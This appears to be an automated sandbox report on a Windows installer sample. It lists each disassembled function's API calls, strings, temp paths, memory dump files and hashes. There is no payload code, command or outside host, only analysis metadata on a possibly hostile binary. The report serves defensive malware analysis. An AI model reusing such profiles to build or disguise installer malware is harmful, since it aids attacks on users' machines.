                                                                                    Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                                                                    • GetMessagePos.USER32 ref: 00404EB4
                                                                                    • ScreenToClient.USER32(?,?), ref: 00404ECE
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Send$ClientScreen
                                                                                    • String ID: f
                                                                                    • API String ID: 41195575-1993550816
                                                                                    • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                    • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                                                                    • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                    • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                                                                    Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                                    • MulDiv.KERNEL32(000B2B20,00000064,000B2D24), ref: 00402FE1
                                                                                    • wsprintfW.USER32 ref: 00402FF1
                                                                                    • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                    Strings
                                                                                    • verifying installer: %d%%, xrefs: 00402FEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                    • String ID: verifying installer: %d%%
                                                                                    • API String ID: 1451636040-82062127
                                                                                    • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                    • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                                                                    • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                    • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                                                                    Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                    • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2667972263-0
                                                                                    • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                    • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                                                                    • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                    • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                                                                    Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                    • String ID:
                                                                                    • API String ID: 1354259210-0
                                                                                    • Opcode ID: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
                                                                                    • Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
                                                                                    • Opcode Fuzzy Hash: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
                                                                                    • Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68
                                                                                    Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                    • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                    • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                    • String ID:
                                                                                    • API String ID: 1849352358-0
                                                                                    • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                    • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                                                                    • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                    • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                                                                    Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(?), ref: 00401E56
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                    • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                    • String ID:
                                                                                    • API String ID: 3808545654-0
                                                                                    • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                    • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                                                                    • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                    • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                                                                    Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Timeout
                                                                                    • String ID: !
                                                                                    • API String ID: 1777923405-2657877971
                                                                                    • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                    • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                                                                    • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                    • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98
                                                                                    Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                    • wsprintfW.USER32 ref: 00404E2D
                                                                                    • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                    • String ID: %u.%u%s%s
                                                                                    • API String ID: 3540041739-3551169577
                                                                                    • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                    • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                                                                    • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                    • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                                                                    Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000023,00000011,00000002), ref: 004024DA
                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000000,00000011,00000002), ref: 0040251A
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseValuelstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp
                                                                                    • API String ID: 2655323295-2591292428
                                                                                    • Opcode ID: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
                                                                                    • Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
                                                                                    • Opcode Fuzzy Hash: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
                                                                                    • Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58
                                                                                    Function 00405F2E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405EDF
                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405F87
                                                                                    • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsuD53D.tmp
                                                                                    • API String ID: 3248276644-2746982651
                                                                                    • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                    • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                                                                    • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                    • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE
                                                                                    Function 00405ED1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405EDF
                                                                                    • CharNextW.USER32(00000000), ref: 00405EE4
                                                                                    • CharNextW.USER32(00000000), ref: 00405EFC
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\nsuD53D.tmp, xrefs: 00405ED2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
